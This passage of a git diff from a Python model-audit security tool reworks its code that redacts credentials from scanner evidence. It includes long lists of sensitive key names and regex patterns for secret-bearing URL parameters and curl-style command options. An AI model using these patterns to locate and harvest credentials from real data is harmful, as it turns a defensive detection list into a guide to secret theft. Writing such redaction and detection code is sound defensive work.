_normalize_percent_encoded_url_delimiters_for_display(source) != source: - return source - encoded_suffix = _ENCODED_MAJOR_SUFFIX_RE.search(source) - if encoded_suffix is None: - return source - prefix = source[: encoded_suffix.start()] - suffix = source[encoded_suffix.end() :] - if _looks_like_encoded_filename_continuation(prefix, suffix): - return source - return prefix or "" - - -def _looks_like_encoded_filename_continuation(prefix: str, suffix: str) -> bool: - try: - prefix_name = os.path.basename(urlsplit(prefix).path) - except Exception: - return False - return "." not in prefix_name and _ENCODED_FILENAME_SUFFIX_RE.fullmatch(suffix) is not None - - -def _is_windows_or_unc_path(source: str) -> bool: - return bool(_WINDOWS_DRIVE_PATH_RE.match(source)) or source.startswith("\\\\") - - -def _is_local_path_identifier(source: str) -> bool: - if os.path.isabs(source) or _is_windows_or_unc_path(source): - return True - if source.startswith(("./", "../", ".\\", "..\\", "~/", "~\\", "\\\\")): - return True - try: - return os.path.lexists(source) - except OSError: - return False - - -def _local_path_exists(source: str) -> bool: - try: - return os.path.lexists(source) - except (OSError, ValueError): - return False - - -def _redact_local_path_suffix(source: str) -> str: - normalized_source = _normalize_percent_encoded_url_delimiters_for_display( - _normalize_escaped_url_delimiters_for_display(source) - ) - suffix_indexes = [index for delimiter in "?#;" if (index := normalized_source.find(delimiter)) >= 0] - if not suffix_indexes: - return source - suffix_index = min(suffix_indexes) - suffix = normalized_source[suffix_index + 1 :] - if _contains_sensitive_assignment(suffix) or _contains_opaque_suffix_part(suffix): - return normalized_source[:suffix_index] or "" - return source - - -def _redact_local_path_identifier(source: str) -> str: - safe_source = _redact_local_path_suffix(source) - normalized_source = _normalize_percent_encoded_url_delimiters_for_display( - _normalize_escaped_url_delimiters_for_display(safe_source) - ) - path_prefix = re.split(r"[?#;]", normalized_source, maxsplit=1)[0] - if _has_sensitive_path_assignment(path_prefix): - return "" - if safe_source != source: - if _has_local_userinfo_credentials(path_prefix, allow_username_only=True): - return "" - return safe_source - if _is_windows_or_unc_path(source): - return source - if _has_local_userinfo_credentials(path_prefix): - return "" - return source - - -def _mapping_key_requires_redaction(key: Any) -> bool: - if isinstance(key, str): - if _mapping_key_is_direct_sensitive_assignment(key): - return True - if redact_source_identifier(key) != key: - return False - if _is_sensitive_export_key(key): - return True - if isinstance(key, bytes): - try: - key.decode("utf-8") - except UnicodeDecodeError: - return True - return False - return not (isinstance(key, (str, int, float, bool)) or key is None) - - -def _mapping_key_is_direct_sensitive_assignment(key: str) -> bool: - normalized_key = _normalize_escaped_url_delimiters_for_display(key) - decoded_key, _ = _bounded_unquote(normalized_key) - stripped_key = decoded_key.lstrip() - for pattern in (_EXPORT_EQUALS_KEY_RE, _EXPORT_HEADER_KEY_RE, _EXPORT_ENCODED_SEPARATOR_RE): - match = pattern.match(stripped_key) - if match is not None and _is_sensitive_export_key(match.group("key")): - return True - return False - - -def _has_local_userinfo_credentials(path: str, *, allow_username_only: bool = False) -> bool: - for segment in re.split(r"[\\/]", path): - decoded_segment, decode_incomplete = _bounded_unquote(segment) - if decode_incomplete or "@" not in decoded_segment: - continue - userinfo, _ = decoded_segment.rsplit("@", 1) - if allow_username_only and userinfo: - return True - if ":" in userinfo and userinfo.split(":", 1)[1]: - return True - return False - - -def _contains_sensitive_assignment(value: str) -> bool: - decoded_value, decode_incomplete = _bounded_unquote(value) - if decode_incomplete: - return True - for part in re.split(r"[?&#;]", decoded_value): - for separator in ("=", ":"): - if separator not in part: - continue - key, assignment_value = part.split(separator, 1) - if _looks_like_credential_value(assignment_value.strip()): - return True - if _is_sensitive_export_key(key.strip()) and assignment_value.strip() not in { - "", - "", - }: - return True - return False - - -def _contains_opaque_suffix_part(value: str) -> bool: - decoded_value, decode_incomplete = _bounded_unquote(value) - if decode_incomplete: - return True - return any(part and "=" not in part for part in re.split(r"[?&#;]", decoded_value)) - - -def _bounded_unquote(value: str) -> tuple[str, bool]: - decoded_value = value - for _ in range(_MAX_CREDENTIAL_KEY_DECODE_PASSES): - next_value = unquote(decoded_value) - if next_value == decoded_value: - return decoded_value, False - decoded_value = next_value - return decoded_value, unquote(decoded_value) != decoded_value - - -def _is_sensitive_export_key(key: object) -> bool: - if isinstance(key, bytes): - try: - key = key.decode("utf-8") - except UnicodeDecodeError: - return False - if not isinstance(key, str): - return False - - key = _ESCAPED_KEY_CHARACTER_RE.sub( - lambda match: chr(int(match.group("unicode") or match.group("hex"), 16)), - key, - ) - decoded_key, decode_incomplete = _bounded_unquote(key) - if decode_incomplete: - return True - separated_key = re.sub(r"(?<=[a-z0-9])(?=[A-Z])", " ", decoded_key) - separated_key = re.sub(r"(?<=[A-Z])(?=[A-Z][a-z])", " ", separated_key) - normalized_key = re.sub(r"[^a-z0-9]+", "", separated_key.casefold()) - if normalized_key in _EXPORT_CREDENTIAL_KEY_NEAR_MATCHES: - return False - key_tokens = {token for token in re.split(r"[^a-z0-9]+", separated_key.casefold()) if token} - if normalized_key.endswith(_EXPORT_SAFE_METADATA_KEY_SUFFIXES): - return False - return ( - is_sensitive_credential_key(decoded_key) - or normalized_key in _EXPORT_CREDENTIAL_KEY_ALIASES - or bool(key_tokens & _EXPORT_CREDENTIAL_KEY_TOKENS) - ) - - -def _redact_export_alias_assignments( - value: str, - *, - preserve_redacted_assignments: bool = False, -) -> str: - value = _normalize_encoded_sensitive_assignment_separators(value) - if not preserve_redacted_assignments: - # Prevalidated text already had sensitive comparisons redacted by a - # domain sanitizer that preserves command operands; generic exports - # need this backstop so `key == value` cannot smuggle a credential. - value = _redact_sensitive_comparison_values(value) - redacted_parts: list[str] = [] - previous_end = 0 - for match in _EXPORT_ASSIGNMENT_RE.finditer(value): - if match.start() < previous_end: - continue - key = match.group("key") or match.group("quoted_key") - if not _is_sensitive_export_key(key) or _assignment_value_is_already_redacted(value, match.end()): - continue - value_end = _assignment_value_end(value, match.end(), key=key) - if preserve_redacted_assignments: - marker_start = _first_redaction_marker_start(value, match.end(), value_end) - if marker_start is not None: - next_sensitive_start = _next_sensitive_assignment_start(value, match.end(), value_end) - if next_sensitive_start is None or marker_start < next_sensitive_start: - # The upstream sanitizer already redacted within this value. - continue - # The marker belongs to a later assignment; stop short of it so - # this raw value is redacted without erasing validated context. - value_end = next_sensitive_start - redacted_parts.extend((value[previous_end : match.end()], "")) - previous_end = value_end - redacted_parts.append(value[previous_end:]) - redacted = "".join(redacted_parts) - - def redact_whitespace_value(match: re.Match[str]) -> str: - if not _is_sensitive_export_key(match.group("key")): - return match.group(0) - return f"{match.group('prefix')}" - - redacted = _EXPORT_OPTION_RE.sub(redact_whitespace_value, redacted) - return _EXPORT_AUTHORIZATION_RE.sub(redact_whitespace_value, redacted) - - -def _redact_sensitive_comparison_values(value: str) -> str: - """Redact values compared against sensitive keys in generic export text.""" - redacted_parts: list[str] = [] - previous_end = 0 - for match in _EXPORT_COMPARISON_RE.finditer(value): - if match.start() < previous_end: - continue - key = match.group("key") or match.group("quoted_key") - if _is_sensitive_export_key(key): - value_end = _assignment_value_end(value, match.end(), key=key) - # Skip only values that are exactly a marker; an embedded marker - # followed by raw content must not shield the tail. - if value[match.end() : value_end].strip() in ("", ""): - continue - redacted_parts.extend((value[previous_end : match.end()], "")) - previous_end = value_end - continue - literal_end = _sensitive_reversed_comparison_literal_end(value, match) - if literal_end is not None: - redacted_parts.extend( - (value[previous_end : match.start()], "", value[match.start("separator") : literal_end]) - ) - previous_end = literal_end - redacted_parts.append(value[previous_end:]) - return "".join(redacted_parts) - - -def _sensitive_reversed_comparison_literal_end(value: str, match: re.Match[str]) -> int | None: - """Return the right-literal end when a literal candidate value is compared to a key name.""" - if match.group("quoted_key") is None: - return None - value_start = match.end() - while value_start < len(value) and value[value_start].isspace() and value[value_start] not in "\r\n": - value_start += 1 - if value_start >= len(value) or value[value_start] not in {'"', "'"}: - return None - quote_end = _find_closing_quote(value, value_start, value[value_start]) - if quote_end < 0: - return None - if not _is_sensitive_export_key(value[value_start + 1 : quote_end]): - return None - return quote_end + 1 - - -def _first_redaction_marker_start(value: str, start: int, end: int) -> int | None: - marker_starts = [ - marker_start - for marker_start in (value.find(marker, start, end) for marker in ("", "")) - if marker_start != -1 - ] - return min(marker_starts) if marker_starts else None - - -def _next_sensitive_assignment_start(value: str, start: int, end: int) -> int | None: - for match in _EXPORT_ASSIGNMENT_RE.finditer(value, start, end): - key = match.group("key") or match.group("quoted_key") - if _is_sensitive_export_key(key): - return match.start() - return None - - -def _normalize_encoded_sensitive_assignment_separators(value: str) -> str: - normalized = value - sensitive_separators = [ - match - for match in _EXPORT_ENCODED_SEPARATOR_RE.finditer(normalized) - if _is_sensitive_export_key(match.group("key")) - ] - for match in reversed(sensitive_separators): - separator = ":" if match.group("separator_code").casefold() == "3a" else "=" - normalized = f"{normalized[: match.start('separator')]}{separator}{normalized[match.end('separator') :]}" - return normalized - - -def _looks_like_credential_value(value: str) -> bool: - return _CREDENTIAL_SHAPED_PROVENANCE_VALUE_RE.search(value) is not None - - -def _assignment_value_end(value: str, start: int, *, key: str) -> int: - value_start = start - while value_start < len(value) and value[value_start].isspace() and value[value_start] not in "\r\n": - value_start += 1 - if value_start < len(value) and value[value_start] in {'"', "'"}: - quote = value[value_start] - quote_end = _find_closing_quote(value, value_start, quote) - if quote_end >= 0: - return quote_end + 1 - start = value_start - if value_start < len(value) and value[value_start] in {"|", ">"}: - return _yaml_block_value_end(value, value_start) - - if _is_cookie_export_key(key): - line_end = re.search(r"[\r\n]", value[start:]) - return len(value) if line_end is None else start + line_end.start() - boundary = _EXPORT_VALUE_BOUNDARY_RE.search(value, start) - return len(value) if boundary is None else boundary.start() - - -def _yaml_block_value_end(value: str, indicator_start: int) -> int: - line_end = re.search(r"\r?\n", value[indicator_start:]) - if line_end is None: - return len(value) - cursor = indicator_start + line_end.end() - while cursor < len(value): - next_line_end = re.search(r"\r?\n", value[cursor:]) - end = len(value) if next_line_end is None else cursor + next_line_end.start() - line = value[cursor:end] - if line.strip() and not line[0].isspace(): - return cursor - (2 if value[cursor - 2 : cursor] == "\r\n" else 1) - if next_line_end is None: - return len(value) - cursor += next_line_end.end() - return len(value) - - -def _find_closing_quote(value: str, quote_start: int, quote: str) -> int: - escaped = False - for index in range(quote_start + 1, len(value)): - character = value[index] - if character == "\\": - escaped = not escaped - continue - if character == quote and not escaped: - return index - escaped = False - return -1 - - -def _assignment_value_is_already_redacted(value: str, start: int) -> bool: - value_start = start - while value_start < len(value) and value[value_start].isspace(): - value_start += 1 - for marker in ("", ""): - if not value.startswith(marker, value_start): - continue - marker_end = value_start + len(marker) - if marker_end == len(value) or value[marker_end].isspace() or value[marker_end] in "/?&#;,)}]": - return True - return False - - -def _is_cookie_export_key(key: str) -> bool: - decoded_key, _ = _bounded_unquote(key) - return re.sub(r"[^a-z0-9]+", "", decoded_key.casefold()) in {"cookie", "setcookie"} - - -def _redact_url_token(url: str) -> str: - """Preserve benign query context while removing credentials from evidence URLs.""" - if is_stream_url(url): - return redact_source_identifier(url) - url = _normalize_percent_encoded_url_delimiters_for_display(url) - encoded_safe_url = _strip_encoded_opaque_suffix(url) - if encoded_safe_url != url: - return _redact_url_path_assignments(encoded_safe_url) - preserve_redacted_params = "" in url - path_redacted_url = _redact_url_path_assignments(url) - try: - original_parts = urlsplit(path_redacted_url) - safe_base = _redact_url_identifier(path_redacted_url) - if safe_base in {"", ""}: - return safe_base - safe_parts = urlsplit(safe_base) - component_probe = urlunsplit(("https", "redaction.invalid", "/", original_parts.query, original_parts.fragment)) - redacted_parts = urlsplit(_redact_cloud_error_for_display(component_probe)) - except Exception: - return "" - - safe_query = _filter_url_params(redacted_parts.query, preserve_redacted_params=preserve_redacted_params) - safe_fragment = _filter_url_params(redacted_parts.fragment, preserve_redacted_params=preserve_redacted_params) - return urlunsplit((safe_parts.scheme, safe_parts.netloc, safe_parts.path, safe_query, safe_fragment)) - - -def _filter_url_params(value: str, *, preserve_redacted_params: bool) -> str: - """Keep structured safe URL parameters and discard opaque credential material.""" - safe_parts: list[str] = [] - for part in re.split(r"[&;]", value): - if "=" not in part: - continue - if part.endswith("=") and not preserve_redacted_params: - continue - safe_parts.append(part) - return "&".join(safe_parts) - - -def _redact_mapping_key(value: Any) -> str | int | float | bool | None: - redacted = redact_source_value(value) - if isinstance(redacted, (str, int, float, bool)) or redacted is None: - return redacted - return redact_source_text(str(redacted)) - - -def _unique_redacted_mapping_key( - key: Any, - mapping: dict[Any, Any], - *, - next_occurrences: dict[str, int], -) -> Any: - """Preserve entries whose credential-safe mapping keys collide.""" - if key not in mapping: - next_occurrences.setdefault(str(key), 2) - return key - base_key = str(key) - occurrence = next_occurrences.get(base_key, 2) - candidate = f"{base_key}#modelaudit-redacted-key-{occurrence}" - while candidate in mapping: - occurrence += 1 - candidate = f"{base_key}#modelaudit-redacted-key-{occurrence}" - next_occurrences[base_key] = occurrence + 1 - return candidate diff --git a/modelaudit/integrations/source_serialization.py b/modelaudit/integrations/source_serialization.py new file mode 100644 index 000000000..0f95821dd --- /dev/null +++ b/modelaudit/integrations/source_serialization.py @@ -0,0 +1,67 @@ +"""Bounded conversion of report values without changing their evidence.""" + +from typing import Any + +from pydantic import AnyUrl, BaseModel + +_MAX_DEPTH = 32 +_MAX_STRING_CHARS = 256 * 1024 + + +def serialize_source_identifier(value: str) -> str: + return value if len(value) <= _MAX_STRING_CHARS else "" + + +def serialize_source_text(value: str) -> str: + return value if len(value) <= _MAX_STRING_CHARS else "" + + +def serialize_source_value(value: Any) -> Any: + """Preserve report shapes and JSON-compatible keys, bounding recursive values.""" + return _serialize(value, set(), 0) + + +def _serialize(value: Any, seen: set[int], depth: int) -> Any: + if depth > _MAX_DEPTH: + return "" + if isinstance(value, BaseModel): + return _serialize(value.model_dump(mode="python"), seen, depth + 1) + if isinstance(value, AnyUrl): + value = str(value) + if isinstance(value, (bytes, bytearray)): + try: + value = bytes(value).decode("utf-8") + except UnicodeDecodeError: + return "" + if isinstance(value, str): + return serialize_source_text(value) + if not isinstance(value, (dict, list, tuple, set, frozenset)): + return value + if id(value) in seen: + return "" + seen.add(id(value)) + try: + if isinstance(value, dict): + result: dict[Any, Any] = {} + occurrences: dict[str, int] = {} + for key, item in value.items(): + key = _serialize(key, set(), 0) + if not isinstance(key, (str, int, float, bool)) and key is not None: + key = serialize_source_text(str(key)) + if key in result: + base_key = str(key) + occurrence = occurrences.get(base_key, 2) + candidate = f"{base_key}#modelaudit-redacted-key-{occurrence}" + while candidate in result: + occurrence += 1 + candidate = f"{base_key}#modelaudit-redacted-key-{occurrence}" + occurrences[base_key] = occurrence + 1 + key = candidate + result[key] = _serialize(item, seen, depth + 1) + return result + items = [_serialize(item, seen, depth + 1) for item in value] + if isinstance(value, tuple): + return tuple(items) + return sorted(items, key=repr) if isinstance(value, (set, frozenset)) else items + finally: + seen.remove(id(value)) diff --git a/modelaudit/scanners/_catboost_evidence_redaction.py b/modelaudit/scanners/_catboost_evidence_redaction.py deleted file mode 100644 index a01b63efb..000000000 --- a/modelaudit/scanners/_catboost_evidence_redaction.py +++ /dev/null @@ -1,4221 +0,0 @@ -"""Helpers for storing scanner evidence without embedded secrets.""" - -from __future__ import annotations - -import ast -import io -import re -import shlex -import string -import tokenize -import unicodedata -from typing import Final, TypeAlias -from urllib.parse import SplitResult, parse_qsl, unquote, unquote_plus, urlencode, urlsplit, urlunsplit - -from ._evidence_redaction import ( - AUTHORIZATION_ALIAS_ASSIGNMENT_KEY as SHARED_AUTHORIZATION_ALIAS_ASSIGNMENT_KEY, -) -from ._evidence_redaction import ( - CAMEL_CASE_SENSITIVE_ASSIGNMENT_KEY as SHARED_CAMEL_CASE_SENSITIVE_ASSIGNMENT_KEY, -) -from ._evidence_redaction import ( - STANDALONE_SECRET_RE as SHARED_STANDALONE_SECRET_RE, -) - -REDACTED_EVIDENCE_VALUE: Final[str] = "" -REDACTED_URL_CREDENTIALS: Final[str] = "" -EVIDENCE_REDACTION_LOOKAHEAD_CHARS: Final[int] = 4096 -EVIDENCE_URL_LOOKAHEAD_CHARS: Final[int] = 64 * 1024 -CURL_COMMAND_SCAN_CHARS: Final[int] = EVIDENCE_URL_LOOKAHEAD_CHARS -MAX_CURL_EXECUTABLE_CANDIDATES: Final[int] = 64 -MAX_SUBPROCESS_CALL_CANDIDATES: Final[int] = 64 -MAX_COMPARISON_CANDIDATES: Final[int] = 64 -MAX_URL_QUERY_DECODE_PASSES: Final[int] = 8 -MAX_NESTED_URL_QUERY_DEPTH: Final[int] = 8 -MAX_EVALUATED_KEY_CHARS: Final[int] = 256 -MAX_KEY_EXPRESSION_CHARS: Final[int] = 300 -MAX_KEY_EXPRESSION_PARSE_ATTEMPTS: Final[int] = 64 -MAX_KEY_EXPRESSION_CANDIDATES: Final[int] = 8 -SENSITIVE_KEYWORD_SIGNALS: Final[tuple[str, ...]] = ( - "access", - "api", - "auth", - "cookie", - "credential", - "jwt", - "pass", - "private", - "pwd", - "sas", - "secret", - "session", - "sig", - "storage", - "token", -) -DICT_LOOKUP_MISSING: Final[object] = object() -DICT_LOOKUP_UNKNOWN: Final[object] = object() -NONE_COMPARABLE: Final[object] = object() -EvaluatedStringSequence: TypeAlias = list[str] | tuple[str, ...] | frozenset[str] -EvaluatedStringValue: TypeAlias = str | EvaluatedStringSequence -ComparableLiteral: TypeAlias = bool | int | EvaluatedStringValue -MembershipContainer: TypeAlias = str | list[object] | tuple[object, ...] | frozenset[object] - -URL_RE: Final[re.Pattern[str]] = re.compile(r"(?i)\b[a-z][a-z0-9+.-]*://[^\s\"'<>]+") -COMMAND_URL_CONTEXT_RE: Final[re.Pattern[str]] = re.compile(r"(?i)\b[a-z][a-z0-9+.-]*://[^\s\"']+") -PYTHON_STRING_PREFIX_RE: Final[str] = r"[rubf]{0,3}" -PYTHON_LITERAL_OPEN_RE: Final[str] = r"(?:\s*\(\s*)*" -PYTHON_STRING_LITERAL_FRAGMENT_RE: Final[str] = ( - rf"(?:{PYTHON_STRING_PREFIX_RE})(?:(?:\\*[\"']){{3}}[\s\S]*?(?:\\*[\"']){{3}}|" - r"(?:\\*[\"'])[\s\S]*?(?:\\*[\"']))" -) -PYTHON_STRING_LITERAL_DETECT_RE: Final[re.Pattern[str]] = re.compile(PYTHON_STRING_LITERAL_FRAGMENT_RE, re.IGNORECASE) -PYTHON_LITERAL_JOINED_FRAGMENT_RE: Final[str] = ( - rf"(?:(?:\s+|\s*\+\s*|\s*%\s*\(?\s*){PYTHON_STRING_LITERAL_FRAGMENT_RE}\s*\)?)" -) -PYTHON_RESIDUAL_LITERAL_OPERATOR_RE: Final[str] = r"(?:[\(\.,+*/%]|\b(?:or|and|if|else)\b)" -QUOTED_KEY_CONTENT_PATTERN: Final[str] = rf"(?:[^\\\"']|\\[\s\S]){{0,{MAX_KEY_EXPRESSION_CHARS}}}?" -SERIALIZED_BACKSLASH_ESCAPE_TOKEN: Final[str] = ( - r"\\+(?:u+005c|x5c|134|U0000005c|u\{0*5c\}|N\{(?:reverse solidus|backslash)\})" -) -SERIALIZED_BACKSLASH_ESCAPE_VALUE_RE: Final[re.Pattern[str]] = re.compile( - r"(?i)(?:u+005c|x5c|134|U0000005c|u\{0*5c\}|N\{(?:reverse solidus|backslash)\})" -) -SERIALIZED_QUOTE_ESCAPE_TOKEN: Final[str] = ( - r"(?:u+0022|u+0027|x22|x27|0?42|0?47|U00000022|U00000027|u\{0*22\}|u\{0*27\}|" - r"N\{(?:quotation mark|double quote|apostrophe|single quote)\})" -) -SERIALIZED_QUOTE_ESCAPE_RE: Final[re.Pattern[str]] = re.compile( - rf"(?i)((?:{SERIALIZED_BACKSLASH_ESCAPE_TOKEN})*)\\+({SERIALIZED_QUOTE_ESCAPE_TOKEN})" -) -SERIALIZED_BACKSLASH_ESCAPED_QUOTE_RE: Final[re.Pattern[str]] = re.compile( - rf"(?i)((?:{SERIALIZED_BACKSLASH_ESCAPE_TOKEN})+)(\\+)([\"'])" -) -SERIALIZED_SLASH_ESCAPE_RE: Final[re.Pattern[str]] = re.compile( - r"(?i)\\(?:x2f|u+002f|U0000002f|u\{0*2f\}|0?57|N\{solidus\})" -) -SERIALIZED_ASSIGNMENT_SEPARATOR_ESCAPE_RE: Final[re.Pattern[str]] = re.compile( - r"(?i)\\+(?:x(?:3a|3d)|u+(?:003a|003d)|U000000(?:3a|3d)|u\{0*(?:3a|3d)\}|0?(?:72|75)|" - r"N\{(?:colon|equals sign)\})" -) -SENSITIVE_QUERY_KEYS: Final[frozenset[str]] = frozenset( - { - "access_key", - "access-key", - "access_key_id", - "access-key-id", - "access_token", - "access-token", - "api_key", - "api-key", - "apikey", - "auth", - "aws_access_key_id", - "aws-secret-access-key", - "aws_secret_access_key", - "aws-session-token", - "aws_session_token", - "awsaccesskeyid", - "awssecretaccesskey", - "awssessiontoken", - "auth_token", - "auth-token", - "basic_auth", - "basic-auth", - "client_secret", - "client-secret", - "cookie", - "credential", - "jwt", - "passphrase", - "password", - "passwd", - "pwd", - "private_key", - "private-key", - "proxy-authorization", - "proxy_authorization", - "proxyauthorization", - "refresh_token", - "refresh-token", - "sas", - "secret", - "secret_key", - "secret-key", - "session_id", - "session-id", - "session_token", - "session-token", - "sessionid", - "sig", - "signature", - "token", - "x-amz-credential", - "x-amz-security-token", - "x-amz-signature", - } -) -COMPACT_SENSITIVE_QUERY_KEYS: Final[frozenset[str]] = frozenset( - re.sub(r"[._-]", "", key.lower()) for key in SENSITIVE_QUERY_KEYS -) -COMPACT_SENSITIVE_KEY_PREFIX: Final[str] = ( - r"(?:db|database|pg|postgres(?:ql)?|mysql|mariadb|mongo(?:db)?|redis|github|gitlab|bitbucket|slack|stripe|" - r"npm|pypi|docker|registry|huggingface|hf|openai|anthropic|azure|gcp|google)" -) -COMPACT_PREFIXED_SENSITIVE_ASSIGNMENT_KEY: Final[str] = ( - rf"(?:{COMPACT_SENSITIVE_KEY_PREFIX}(?:password|token|secret)|" - r"azurestoragekey|" - r"(?-i:[A-Z0-9]+(?:PASSWORD|TOKEN|SECRET)))" -) -SEPARATED_SENSITIVE_ASSIGNMENT_KEY: Final[str] = ( - r"(?:[a-z0-9]+[_.-])*" - rf"(?:{COMPACT_PREFIXED_SENSITIVE_ASSIGNMENT_KEY}|" - r"access[_.-]?key(?:[_.-]?id)?|access[_.-]?token|api[_.-]?key|apikey|" - r"aws(?:accesskeyid|secretaccesskey|sessiontoken)|auth[_.-]?token|client[_.-]?secret|" - r"auth|basic[_.-]?auth|cookie|credential|google[_.-]?access[_.-]?id|jwt|passphrase|password|passwd|" - r"private[_.-]?key|pwd|" - r"refresh[_.-]?token|sas|secret|" - r"secret[_.-]?key|session[_.-]?(?:id|token)|sessionid|signature|sig|storage[_.-]?key|token)" - r"(?:s|[0-9]+|[_.-]?values?)?" -) -CAMEL_CASE_SENSITIVE_NEAR_MATCH_SUFFIX: Final[str] = r"(?:Algorithm|Cache|Count|Format|Hint|Ingredient|Policy)" -CATBOOST_CAMEL_CASE_SENSITIVE_ASSIGNMENT_KEY: Final[str] = ( - rf"(?![A-Za-z0-9]*{CAMEL_CASE_SENSITIVE_NEAR_MATCH_SUFFIX}\b)" - rf"{SHARED_CAMEL_CASE_SENSITIVE_ASSIGNMENT_KEY}" -) -SENSITIVE_ASSIGNMENT_KEY: Final[str] = ( - rf"(?:{SEPARATED_SENSITIVE_ASSIGNMENT_KEY}|(?-i:{CATBOOST_CAMEL_CASE_SENSITIVE_ASSIGNMENT_KEY}))" -) -AUTHORIZATION_KEY_PATTERN: Final[str] = SHARED_AUTHORIZATION_ALIAS_ASSIGNMENT_KEY -ASSIGNMENT_SEPARATOR: Final[str] = r"(?::=|\*\*=|//=|<<=|>>=|[+\-*/%@&|^]=|[:=](?!=))" -ASSIGNMENT_SEPARATOR_RE: Final[re.Pattern[str]] = re.compile(rf"(?i)\s*{ASSIGNMENT_SEPARATOR}\s*") -KNOWN_AUTHORIZATION_SCHEME_PATTERN: Final[str] = ( - r"(?:bearer|basic|digest|token|negotiate|ntlm|aws4-hmac-sha256|foo\.bar)" -) -COMPOUND_AUTHORIZATION_SCHEME_PATTERN: Final[str] = r"(?:digest|aws4-hmac-sha256)" -AUTHORIZATION_SCHEME_PATTERN: Final[str] = rf"(?:{KNOWN_AUTHORIZATION_SCHEME_PATTERN}\s+)?" -SENSITIVE_ASSIGNMENT_KEY_RE: Final[re.Pattern[str]] = re.compile(rf"(?i)^{SENSITIVE_ASSIGNMENT_KEY}$") -COMPARISON_OPERATOR_PATTERN: Final[str] = ( - r"(?:===|!==|==|!=|>=|<=|<>|" - r"(?])<(?![<=>]|redacted>|credentials-redacted>)|" - r"(?])(?(?![=>])|" - r"(?\w.])" -) -COMMAND_SECRET_LONG_OPTION_NAME_PATTERN: Final[str] = ( - r"(?:account[_-]?key|storage[_-]?key|federated[_-]?token|cookie|password|passwd|passphrase|pass|" - r"proxy-password|proxy-passphrase|proxy-pass|" - r"proxy-tls-?password|tls-?password|ftp-account|ftp-password|http-password|oauth2-bearer|" - r"client[_-]?secret|api[_-]?key|token|secret)" -) -COMMAND_SECRET_LONG_OPTION_PATTERN: Final[str] = rf"--{COMMAND_SECRET_LONG_OPTION_NAME_PATTERN}" -COMMAND_SECRET_OPTION_PREFIX_PATTERN: Final[str] = ( - rf"(?:(?(?\$?\"(?:\\.|[^\"\\])*\"|\$?'(?:\\.|[^'\\])*'|[^\s;&|)]+)" -) -COMMAND_SHELL_SENSITIVE_ASSIGNMENT_RE: Final[re.Pattern[str]] = re.compile( - rf"(?is)(?P\b(?:{SENSITIVE_ASSIGNMENT_KEY})\s*=\s*)" - r"(?P\$?\"(?:\\.|[^\"\\])*\"|\$?'(?:\\.|[^'\\])*'|(?!\\+[\"'])[^\s\"';&|)]+)" -) -COMMAND_SECRET_OPTION_SERIALIZED_QUOTED_RE: Final[re.Pattern[str]] = re.compile( - rf"(?is)(?P